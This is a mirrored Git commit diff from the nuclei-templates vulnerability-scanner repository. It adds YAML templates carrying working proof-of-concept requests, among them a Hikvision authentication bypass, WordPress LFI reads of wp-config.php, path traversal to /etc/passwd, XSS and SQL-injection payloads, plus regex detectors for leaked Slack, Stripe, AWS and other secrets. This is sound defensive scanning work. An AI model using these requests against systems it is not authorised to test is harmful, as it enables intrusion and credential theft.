daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' of https://github.com/projectdiscovery/nuclei-templates

patch-1
Noam Rathaus 2021-04-12 09:35:53 +03:00
parent 9f5d6c5eaa 3e87b93258
commit ed8ea816eb
67 changed files with 958 additions and 96 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
.github/scripts/README.tmpl vendored
View File

@ -18,7 +18,8 @@ Nuclei Templates
<a href="#-contributions">Contributions</a> •
<a href="#-discussion">Discussion</a> •
<a href="#-community">Community</a> •
<a href="https://discord.gg/KECAGdH">Join Discord</a>
<a href="https://nuclei.projectdiscovery.io/faq/templates/">FAQs</a> •
<a href="https://discord.gg/projectdiscovery">Join Discord</a>
</p>
----

1
.nuclei-ignore
View File

@ -13,6 +13,7 @@ tags:
- "iot"
- "misc"
- "fuzz"
- "revision"
# files is a list of files to ignore template execution
# unless asked for by the user.

13
README.md
View File

@ -18,7 +18,8 @@ Nuclei Templates
<a href="#-contributions">Contributions</a>
<a href="#-discussion">Discussion</a>
<a href="#-community">Community</a>
<a href="https://discord.gg/KECAGdH">Join Discord</a>
<a href="https://nuclei.projectdiscovery.io/faq/templates/">FAQs</a>
<a href="https://discord.gg/projectdiscovery">Join Discord</a>
</p>
----
@ -37,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts | Templates | Counts |
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
| cves | 267 | vulnerabilities | 119 | exposed-panels | 117 |
| takeovers | 67 | exposures | 66 | technologies | 58 |
| misconfiguration | 54 | workflows | 27 | miscellaneous | 20 |
| default-logins | 21 | exposed-tokens | 9 | dns | 8 |
| cves | 270 | vulnerabilities | 121 | exposed-panels | 118 |
| takeovers | 67 | exposures | 71 | technologies | 60 |
| misconfiguration | 56 | workflows | 27 | miscellaneous | 20 |
| default-logins | 21 | exposed-tokens | 33 | dns | 8 |
| fuzzing | 7 | helpers | 6 | iot | 11 |
**82 directories, 889 files**.
**95 directories, 929 files**.
</td>
</tr>

24
cves/2017/CVE-2017-7921.yaml Normal file
View File

@ -0,0 +1,24 @@
id: CVE-2017-7921
info:
name: Hikvision Authentication Bypass
author: princechaddha
severity: high
reference: https://www.cvedetails.com/cve/CVE-2017-7921/
tags: cve,cve2017,auth-bypass
requests:
- method: GET
path:
- "{{BaseURL}}/system/deviceInfo?auth=YWRtaW46MTEK"
matchers-condition: and
matchers:
- type: word
words:
- "<firmwareVersion>"
part: body
- type: word
words:
- "application/xml"
part: header

12
cves/2018/CVE-2018-0101.yaml
View File

@ -35,6 +35,11 @@ requests:
<host-scan-reply>A</host-scan-reply>
</config-auth>
- |
GET / HTTP/1.1
Host: {{Hostname}}
Accept: */*
req-condition: true
matchers-condition: and
matchers:
@ -49,4 +54,9 @@ requests:
- "status_code_2 == 502"
- "status_code_2 == 503"
- "status_code_2 == 504"
condition: or
condition: or
- type: dsl
dsl:
- "status_code_3 == 200"
negative: true

27
cves/2018/CVE-2018-7422.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2018-7422
info:
name: WordPress Site Editor Plugin LFI
author: LuskaBol
severity: high
tags: cve,cve2018,wordpress,wp-plugin,lfi
description: A Local File Inclusion vulnerability in the Site Editor plugin through 1.1.1 for WordPress allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php.
reference: https://www.exploit-db.com/exploits/44340
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php'
matchers-condition: and
matchers:
- type: word
words:
- "DB_NAME"
- "DB_PASSWORD"
part: body
condition: and
- type: status
status:
- 200

4
cves/2019/CVE-2019-12461.yaml
View File

@ -7,9 +7,7 @@ info:
description: Web Port 1.19.1 allows XSS via the /log type parameter.
tags: cve,cve2019,xss
reference: https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS
# Vendor Homepage: https://webport.se/
# Software Link: https://webport.se/nedladdningar/
# reference:
software: https://webport.se/nedladdningar/
requests:
- method: GET

4
cves/2019/CVE-2019-18394.yaml
View File

@ -2,7 +2,7 @@ id: CVE-2019-18394
info:
name: Openfire Full Read SSRF
author: pdteam - nuclei.projectdiscovery.io
author: pdteam
severity: critical
description: A Server Side Request Forgery (SSRF) vulnerability in FaviconServlet.java in Ignite Realtime Openfire through 4.4.2 allows attackers to send arbitrary HTTP GET requests.
refrense: |
@ -17,4 +17,4 @@ requests:
matchers:
- type: word
words:
- <h1>Burp Collaborator Server</h1>
- <h1>Burp Collaborator Server</h1>

30
cves/2020/CVE-2020-15500.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2020-15500
info:
name: TileServer GL Reflected XSS
author: Akash.C
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-15500
source: https://github.com/maptiler/tileserver-gl/issues/461
tags: cve,cve2020,xss,tileserver
requests:
- method: GET
path:
- '{{BaseURL}}/?key=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"
- type: word
words:
part: body
- '"><script>alert(document.domain);</script>'

25
cves/2020/CVE-2020–26073.yaml
View File

@ -1,25 +0,0 @@
id: CVE-2020-26073
info:
name: Cisco SD-WAN vManage Software Directory Traversal
author: madrobot
severity: high
description: |
A vulnerability in the application data endpoints of Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to gain access to sensitive information.
The vulnerability is due to improper validation of directory traversal character sequences within requests to application programmatic interfaces (APIs). An attacker could exploit this vulnerability by sending malicious requests to an API within the affected application. A successful exploit could allow the attacker to conduct directory traversal attacks and gain access to sensitive information including credentials or user tokens.
reference: https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-vman-traversal-hQh24tmk.html
tags: lfi,cve,cve2020,cisco
requests:
- method: GET
path:
- "{{BaseURL}}/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
words:
- "root:[x*]:0:0:"
part: body

31
cves/2021/CVE-2021-30151.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2021-30151
info:
name: CVE-2021-30151
author: DhiyaneshDk
severity: low
description: Sidekiq through 5.1.3 and 6.x through 6.2.0 allows XSS via the queue name of the live-poll feature when Internet Explorer is used.
reference: |
- https://github.com/mperham/sidekiq/issues/4852
- https://nvd.nist.gov/vuln/detail/CVE-2021-30151
tags: cve,cve2021,xss,sidekiq
requests:
- method: GET
path:
- '{{BaseURL}}/sidekiq/queues/"onmouseover="alert(nuclei)"'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "onmouseover=\"alert('nuclei')"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

4
default-logins/nagios/nagios-default-credential.yaml
View File

@ -1,12 +1,10 @@
id: nagios-default-credentials
info:
name: Nagios Default Credentials Check
author: iamthefrogy
severity: high
tags: nagios,default-login
reference: https://www.nagios.org
requests:
- method: GET
path:
@ -23,4 +21,4 @@ requests:
words:
- 'Current Status'
- 'Reports'
condition: and
condition: and

22
exposed-panels/somfy-login.yaml Normal file
View File

@ -0,0 +1,22 @@
id: somfy-login
info:
name: Somfy Login Page
author: DhiyaneshDK
severity: info
tags: panel
requests:
- method: GET
path:
- '{{BaseURL}}/m_login.htm'
matchers-condition: and
matchers:
- type: word
words:
- Home motion by Somfy
- type: status
status:
- 200

6
exposed-tokens/aws/amazon-mws-auth-token-value.yaml → exposed-tokens/amazon/amazon-mws-auth-token.yaml
View File

@ -1,9 +1,9 @@
id: amazon-mws-auth-token-value
id: amazon-mws-auth-token
info:
name: Amazon MWS Auth Token
author: puzzlepeaches
name: "Amazon MWS Auth Token"
severity: medium
severity: info
tags: token,aws
requests:

17
exposed-tokens/amazon/amazon-sns-topic.yaml Executable file
View File

@ -0,0 +1,17 @@
id: amazon-sns-topic
info:
name: Amazon SNS Topic Disclosure
author: Ice3man
severity: info
tags: token,amazon
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- 'arn:aws:sns:[a-z0-9\-]+:[0-9]+:[A-Za-z0-9\-_]+'

2
exposed-tokens/aws/aws-access-key-value.yaml → exposed-tokens/amazon/aws-access-key-value.yaml
View File

@ -4,7 +4,7 @@ info:
name: AWS Access Key ID Value
author: Swissky
severity: info
tags: token,aws
tags: token,aws,amazon
requests:
- method: GET

18
exposed-tokens/artifactory/artifactory-api-password.yaml Executable file
View File

@ -0,0 +1,18 @@
id: artifactory-api-password
info:
name: Artifactory Password Disclosure
author: Ice3man
severity: info
tags: token,artifactory
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- '(?:\s|=|:|"|^)AP[\dABCDEF][a-zA-Z0-9]{8,}'

18
exposed-tokens/artifactory/artifactory-api-token.yaml Executable file
View File

@ -0,0 +1,18 @@
id: artifactory-api-token
info:
name: Artifactory API Token Disclosure
author: Ice3man
severity: info
tags: token,artifactory
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- '(?:\s|=|:|"|^)AKC[a-zA-Z0-9]{10,}'

18
exposed-tokens/bitly/bitly-secret-key.yaml Executable file
View File

@ -0,0 +1,18 @@
id: bitly-secret-key
info:
name: Bitly Secret Key Disclosure
author: Ice3man
severity: info
tags: token,bitly
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- 'R_[0-9a-f]{32}'

18
exposed-tokens/cloudinary/cloudinary-credentials.yaml Executable file
View File

@ -0,0 +1,18 @@
id: cloudinary-credentials
info:
name: Cloudinary Credentials Disclosure
author: Ice3man
severity: info
tags: token,cloudinary
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- 'cloudinary://[0-9]+:[A-Za-z0-9\-_\.]+@[A-Za-z0-9\-_\.]+'

18
exposed-tokens/discord/discord-webhook.yaml Executable file
View File

@ -0,0 +1,18 @@
id: discord-webhook
info:
name: Discord Webhook Disclosure
author: Ice3man
severity: info
tags: token,discord
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- 'https://discordapp\.com/api/webhooks/[0-9]+/[A-Za-z0-9\-]+'

14
exposed-tokens/generic/general-tokens.yaml
View File

@ -10,14 +10,9 @@ requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- (K|k)ey(up|down|press)
negative: true
- type: dsl
dsl:
- regex("TOKEN[\\-|_|A-Z0-9]*(\'|\")?(:|=)(\'|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body),"",""))
@ -26,6 +21,13 @@ requests:
- regex("SECRET[\\-|_|A-Z0-9]*(\'|\")?(:|=)(\'|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body),"",""))
- regex("AUTHORIZATION[\\-|_|A-Z0-9]*(\'|\")?(:|=)(\'|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body),"",""))
- regex("PASSWORD[\\-|_|A-Z0-9]*(\'|\")?(:|=)(\'|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body),"",""))
- type: regex
part: body
regex:
- (K|k)ey(up|down|press)
negative: true
extractors:
- type: regex
part: body

18
exposed-tokens/generic/jdbc-connection-string.yaml Executable file
View File

@ -0,0 +1,18 @@
id: jdbc-connection-string
info:
name: JDBC Connection String Disclosure
author: Ice3man
severity: info
tags: token
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- 'jdbc:[a-z:]+://[A-Za-z0-9\.\-_:;=/@?,&]+'

18
exposed-tokens/generic/jwt-token.yaml Normal file
View File

@ -0,0 +1,18 @@
id: jwt-token
info:
name: JWT Token Disclosure
author: Ice3man
severity: info
tags: token
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- 'eyJ[a-zA-Z0-9]{10,}\.eyJ[a-zA-Z0-9]{10,}\.[a-zA-Z0-9_\-]{10,}'

1
exposed-tokens/google/google-api-key.yaml
View File

@ -10,6 +10,7 @@ requests:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/hopfully404"
extractors:
- type: regex

18
exposed-tokens/google/google-calendar-link.yaml Executable file
View File

@ -0,0 +1,18 @@
id: google-calendar-link
info:
name: Google Calendar URI Disclosure
author: Ice3man
severity: info
tags: token,google
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- 'https://www\.google\.com/calendar/embed\?src=[A-Za-z0-9%@&;=\-_\./]+'

18
exposed-tokens/google/oauth-access-key.yaml Executable file
View File

@ -0,0 +1,18 @@
id: google-oauth-access-key
info:
name: Google OAuth Access Key Disclosure
author: Ice3man
severity: info
tags: token
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- 'ya29\.[0-9A-Za-z\-_]+'

2
exposed-tokens/mailchimp/mailchimp-api-key.yaml
View File

@ -3,7 +3,7 @@ id: mailchimp-access-key-value
info:
name: Mailchimp API Value
author: puzzlepeaches
severity: medium
severity: info
tags: token,mailchimp
requests:

17
exposed-tokens/microsoft/microsoft-teams-webhook.yaml Executable file
View File

@ -0,0 +1,17 @@
id: microsoft-teams-webhook
info:
name: Microsoft Teams Webhook Disclosure
author: Ice3man
severity: info
tags: token
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- 'https://outlook\.office\.com/webhook/[A-Za-z0-9\-@]+/IncomingWebhook/[A-Za-z0-9\-]+/[A-Za-z0-9\-]+'

17
exposed-tokens/newrelic/newrelic-admin-api-key.yaml Normal file
View File

@ -0,0 +1,17 @@
id: newrelic-admin-api-key
info:
name: Admin API Key Disclosure
author: Ice3man
severity: info
tags: token
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- '(?i)NRAA-[a-f0-9]{27}'

17
exposed-tokens/newrelic/newrelic-insights-key.yaml Normal file
View File

@ -0,0 +1,17 @@
id: newrelic-insights-key
info:
name: Insights Keys Disclosure
author: Ice3man
severity: info
tags: token
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- '(?i)NRI(?:I|Q)-[A-Za-z0-9\-_]{32}'

17
exposed-tokens/newrelic/newrelic-rest-api-key.yaml Normal file
View File

@ -0,0 +1,17 @@
id: newrelic-rest-api-key
info:
name: REST API Key Disclosure
author: Ice3man
severity: info
tags: token
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- '(?i)NRRA-[a-f0-9]{42}'

17
exposed-tokens/newrelic/newrelic-synthetics-location-key.yaml Normal file
View File

@ -0,0 +1,17 @@
id: newrelic-synthetics-location-key
info:
name: Synthetics Location Key Disclosure
author: Ice3man
severity: info
tags: token
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- '(?i)NRSP-[a-z]{2}[0-9]{2}[a-f0-9]{31}'

17
exposed-tokens/paypal/braintree-access-token.yaml Executable file
View File

@ -0,0 +1,17 @@
id: braintree-access-token
info:
name: PayPal Braintree Access Token Disclosure
author: Ice3man
severity: info
tags: token
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- 'access_token\$production\$[0-9a-z]{16}\$[0-9a-f]{32}'

17
exposed-tokens/picatic/picatic-api-key.yaml Executable file
View File

@ -0,0 +1,17 @@
id: picatic-api-key
info:
name: Picatic API Key Disclosure
author: Ice3man
severity: info
tags: token
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- 'sk_live_[0-9a-z]{32}'

17
exposed-tokens/sendgrid/sendgrid-api-key.yaml Normal file
View File

@ -0,0 +1,17 @@
id: sendgrid-api-key
info:
name: Sendgrid API Key Disclosure
author: Ice3man
severity: info
tags: token
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- 'SG\.[a-zA-Z0-9-_]{22}\.[a-zA-Z0-9_-]{43}'

28
exposed-tokens/slack/slack-access-token.yaml
View File

@ -1,28 +0,0 @@
id: slack-access-token
# xoxp-702234529XXX-688970480XXX-109182524XXXX-87fa5b4d2e62ac5c16fc6ea93bXXXXXX
# xoxb-702234529XXX-1076883857XXX-Ou9aRuvtFZ4DuTsepevXXXXX
info:
name: Slack access token
author: nadino
severity: medium
tags: token,slack
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
name: person-token
part: body
regex:
- "xoxp-[0-9A-Za-z\\-]{72}"
- type: regex
name: bot-token
part: body
regex:
- "xoxb-[0-9A-Za-z\\-]{51}"

8
exposed-tokens/generic/http-username-password.yaml → exposed-tokens/slack/slack-bot-token.yaml
View File

@ -1,10 +1,10 @@
id: http-username-password
id: slack-bot-token
info:
name: Http usernamme password
name: Slack access token
author: nadino
severity: info
tags: token
tags: token,slack
requests:
- method: GET
@ -15,4 +15,4 @@ requests:
- type: regex
part: body
regex:
- '(ftp|ftps|http|https)://[A-Za-z0-9-_:\.~]+(@)'
- "xoxb-[0-9A-Za-z\\-]{51}"

18
exposed-tokens/slack/slack-user-token.yaml Normal file
View File

@ -0,0 +1,18 @@
id: slack-user-token
info:
name: Slack User token disclosure
author: Ice3man
severity: info
tags: token,slack
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- "xoxp-[0-9A-Za-z\\-]{72}"

18
exposed-tokens/slack/slack-webhook-token.yaml Executable file
View File

@ -0,0 +1,18 @@
id: slack-webhook-token
info:
name: Slack Webhook Disclosure
author: Ice3man
severity: info
tags: token,slack
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- "https://hooks\\.slack\\.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}"

17
exposed-tokens/sonarqube/sonarqube-token.yaml Executable file
View File

@ -0,0 +1,17 @@
id: sonarqube-token
info:
name: SonarQube Token Disclosure
author: Ice3man
severity: info
tags: token
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- "sonar.{0,50}(?:\"|'|`)?[0-9a-f]{40}(?:\"|'|`)?"

17
exposed-tokens/stripe/stripe-restricted-key.yaml Executable file
View File

@ -0,0 +1,17 @@
id: stripe-restricted-key
info:
name: Stripe Restricted Key Disclosure
author: Ice3man
severity: info
tags: token
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- 'rk_(?:live|test)_[0-9a-zA-Z]{24}'

17
exposed-tokens/stripe/stripe-secret-key.yaml Executable file
View File

@ -0,0 +1,17 @@
id: stripe-secret-key
info:
name: Stripe Secret Key Disclosure
author: Ice3man
severity: info
tags: token
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- 'sk_(?:live|test)_[0-9a-zA-Z]{24}'

17
exposed-tokens/zapier/zapier-webhook-token.yaml Executable file
View File

@ -0,0 +1,17 @@
id: zapier-webhook-token
info:
name: Zapier Webhook Disclosure
author: Ice3man
severity: info
tags: token
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- 'https://(?:www.)?hooks\.zapier\.com/hooks/catch/[A-Za-z0-9]+/[A-Za-z0-9]+/'

17
exposed-tokens/zoho/zoho-webhook-token.yaml Executable file
View File

@ -0,0 +1,17 @@
id: zoho-webhook-token
info:
name: Zoho Webhook Disclosure
author: Ice3man
severity: info
tags: token
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- 'https://creator\.zoho\.com/api/[A-Za-z0-9/\-_\.]+\?authtoken=[A-Za-z0-9]+'

2
exposures/configs/amazon-docker-config-disclosure.yaml
View File

@ -4,7 +4,7 @@ info:
name: Dockerrun AWS Configuration Exposure
author: pdteam
severity: medium
tags: config,exposure
tags: config,exposure,aws
requests:
- method: GET

27
exposures/configs/coremail-config-disclosure.yaml Normal file
View File

@ -0,0 +1,27 @@
id: coremail-config-disclosure
info:
name: Coremail Config Disclosure
author: princechaddha
severity: high
reference: https://www.secpulse.com/archives/107611.html
tags: config,exposure
requests:
- method: GET
path:
- '{{BaseURL}}/mailsms/s?func=ADMIN:appState&dumpConfig=/'
matchers-condition: and
matchers:
- type: word
words:
- "<object name=\"cm_md_db\">"
- 'containerDefinitions'
- '<string name="User">coremail</string>'
- '<string name="EnableCoremailSmtp">'
condition: or
- type: status
status:
- 200

0
exposures/configs/docker-compose-config.yml → exposures/configs/docker-compose-config.yaml
View File

6
exposures/configs/laravel-env.yaml
View File

@ -1,9 +1,11 @@
id: laravel-env
info:
name: Laravel .env file
name: Laravel .env file accessible
author: pxmme1337 & dwisiswant0 & geeknik & emenalf
severity: medium
severity: critical
description: Laravel uses the .env file to store sensitive information like database credentials and tokens. It should not be publicly accessible.
reference: https://laravel.com/docs/master/configuration#environment-configuration
tags: config,exposure
requests:

25
exposures/configs/s3cmd-config.yaml Executable file
View File

@ -0,0 +1,25 @@
id: s3cmd-config
info:
name: S3CMD Configuration Disclosure
author: Ice3man
severity: info
tags: amazon,config,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/s3cmd.ini"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '[default]'
- 'access_key'
condition: and
- type: status
status:
- 200

1
exposures/configs/server-private-keys.yaml
View File

@ -9,6 +9,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/localhost.key"
- "{{BaseURL}}/host.key"
- "{{BaseURL}}/www.key"
- "{{BaseURL}}/private-key"

33
exposures/configs/yii-debugger.yaml Normal file
View File

@ -0,0 +1,33 @@
id: yii-debugger
info:
name: View Yii Debugger Information
author: geeknik
reference: https://yii2-framework.readthedocs.io/en/stable/guide/tool-debugger/
severity: info
requests:
- method: GET
path:
- "{{BaseURL}}/debug/default/view.html"
- "{{BaseURL}}/debug/default/view"
- "{{BaseURL}}/frontend/web/debug/default/view"
- "{{BaseURL}}/web/debug/default/view"
- "{{BaseURL}}/sapi/debug/default/view"
redirects: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<title>Yii Debugger</title>"
- "Status"
- "Route"
- "Log"
- "Time"
- "Memory"
- "DB"
condition: and

27
exposures/logs/access-log.yaml Normal file
View File

@ -0,0 +1,27 @@
id: access-log-file
info:
name: Publicly accessible access-log file
author: sheikhrishad
severity: low
tags: log
requests:
- method: GET
path:
- "{{BaseURL}}/access.log"
matchers-condition: and
matchers:
- type: word
words:
- '"GET /'
- type: word
words:
- "text/plain"
part: header
- type: status
status:
- 200

5
exposures/logs/error-logs.yaml
View File

@ -8,6 +8,10 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/routes/error_log"
- "{{BaseURL}}/config/error_log"
- "{{BaseURL}}/error_log"
- "{{BaseURL}}/errors_log"
- "{{BaseURL}}/logs/error.log"
- "{{BaseURL}}/logs/errors.log"
- "{{BaseURL}}/log/error.log"
@ -21,7 +25,6 @@ requests:
- "{{BaseURL}}/admin/logs/error.log"
- "{{BaseURL}}/admin/logs/errors.log"
- "{{BaseURL}}/admin/log/error.log"
- "{{BaseURL}}/admin/logs/errors.log"
- "{{BaseURL}}/admin/error.log"
- "{{BaseURL}}/admin/errors.log"
- "{{BaseURL}}/{{Hostname}}/error.log"

19
exposures/logs/laravel-log-file.yaml
View File

@ -2,8 +2,10 @@ id: laravel-log-file
info:
name: Laravel log file publicly accessible
author: sheikhrishad
severity: low
author: sheikhrishad & geeknik
severity: high
description: The log file of this Laravel web app might reveal details on the inner workings of the app, possibly even tokens, credentials or personal information.
reference: https://laravel.com/docs/master/logging
tags: laravel,log,exposure
requests:
@ -14,10 +16,19 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- "InvalidArgumentException"
condition: and
- "local.ERROR"
- "ErrorException"
- "syntax error"
condition: or
- type: word
part: header
words:
- "text/plain"
- "text/x-log"
condition: or
- type: status
status:
- 200

24
exposures/logs/laravel-telescope.yaml Normal file
View File

@ -0,0 +1,24 @@
id: laravel-telescope
info:
name: Laravel Telescope Disclosure
author: geeknik
description: Telescope provides insight into the requests coming into your application, exceptions, log entries, database queries, queued jobs, mail, notifications, cache operations, scheduled tasks, variable dumps, and more.
reference: https://laravel.com/docs/8.x/telescope
severity: medium
tags: laravel,disclosure,log
requests:
- method: GET
path:
- "{{BaseURL}}/telescope/requests"
redirects: true
matchers:
- type: word
words:
- "<title>Telescope</title>"
- "Requests"
- "Commands"
- "Schedule"
condition: and

25
misconfiguration/aws-object-listing.yaml Normal file
View File

@ -0,0 +1,25 @@
id: aws-object-listing
info:
name: AWS bucket with Object listing
author: pdteam
severity: low
reference: https://mikey96.medium.com/cloud-based-storage-misconfigurations-critical-bounties-361647f78a29
tags: aws,misconfig
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
words:
- '<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">'
part: body
- type: word
words:
- application/xml
part: header

27
misconfiguration/unautneicated-cache-purge.yaml Normal file
View File

@ -0,0 +1,27 @@
id: unauthenticated-cache-purge
info:
name: Varnish Unauthenticated Cache Purge
author: 0xelkomy
severity: low
description: As per guideline one should protect purges with ACLs from unauthorized hosts.
reference: https://book.varnish-software.com/4.0/chapters/Cache_Invalidation.html
hackerone: https://hackerone.com/reports/154278
tags: varnish,misconfig,cache
requests:
- method: PURGE
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>200 Purged</title>'
- '"status": "ok"'
condition: or
- type: status
status:
- 200

21
network/openssh5.3-detect.yaml Normal file
View File

@ -0,0 +1,21 @@
id: openssh-5.3-detect
info:
name: OpenSSH 5.3 Detection
author: iamthefrogy
severity: low
tags: network,openssh
description: OpenSSH 5.3 is vulnerable to username enumeraiton and DoS vulnerabilities.
reference: |
- http://seclists.org/fulldisclosure/2016/Jul/51
- https://security-tracker.debian.org/tracker/CVE-2016-6210
- http://openwall.com/lists/oss-security/2016/08/01/2
network:
- host:
- "{{Hostname}}"
- "{{Hostname}}:22"
matchers:
- type: word
words:
- "SSH-2.0-OpenSSH_5.3"

29
technologies/aws-bucket-service.yaml Normal file
View File

@ -0,0 +1,29 @@
id: aws-bucket-service
info:
name: Detect websites using AWS bucket storage
author: pdteam
severity: info
tags: aws,tech
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: dsl
dsl:
- contains(tolower(all_headers), 'x-amz-bucket')
- contains(tolower(all_headers), 'x-amz-request')
- contains(tolower(all_headers), 'x-amz-id')
- contains(tolower(all_headers), 'AmazonS3')
part: header
condition: or
- type: dsl
dsl:
- contains(tolower(all_headers), 'x-guploader-uploadid')
part: header
negative: true

25
technologies/google-bucket-service.yaml Normal file
View File

@ -0,0 +1,25 @@
id: google-bucket-service
info:
name: Detect websites using Google bucket storage
author: pdteam
severity: info
tags: google,tech
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: dsl
dsl:
- contains(tolower(all_headers), 'x-goog-component-count')
- contains(tolower(all_headers), 'x-goog-expiration')
- contains(tolower(all_headers), 'x-goog-generation')
- contains(tolower(all_headers), 'x-goog-metageneration')
- contains(tolower(all_headers), 'x-goog-stored-content-encoding')
- contains(tolower(all_headers), 'x-goog-stored-content-length')
- contains(tolower(all_headers), 'x-guploader-uploadid')
part: header
condition: or

2
vulnerabilities/generic/basic-cors.yaml
View File

@ -3,7 +3,7 @@ id: basic-cors-misconfig
info:
name: Basic CORS misconfiguration
author: nadino
severity: low
severity: info
tags: cors
requests:

4
vulnerabilities/moodle/moodle-jitsi-plugin-xss.yaml
View File

@ -5,13 +5,13 @@ info:
author: aceseven (digisec360)
description: Cross-site Scripting in moodle jitsi plugin
severity: medium
tags: moodle,jitsi,xss
tags: moodle,jitsi,xss,revision
reference: https://github.com/udima-university/moodle-mod_jitsi/issues/67
requests:
- method: GET
path:
- "{{BaseURL}}/mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2Ftargetdomain.com%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1"
- "{{BaseURL}}/mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2F{{Hostname}}%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1"
matchers-condition: and
matchers:

22
vulnerabilities/other/etouch-v2-sqli.yaml Normal file
View File

@ -0,0 +1,22 @@
id: etouch-v2-sqli
info:
name: Etouch v2 SQL Injection
author: princechaddha
severity: high
tags: etouch,sqli
requests:
- method: GET
path:
- "{{BaseURL}}/upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)''"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "c4ca4238a0b923820dcc509a6f75849b"
part: body

30
vulnerabilities/other/turbocrm-xss.yaml Normal file
View File

@ -0,0 +1,30 @@
id: turbocrm-xss
info:
name: TurboCRM XSS
author: pikpikcu
severity: medium
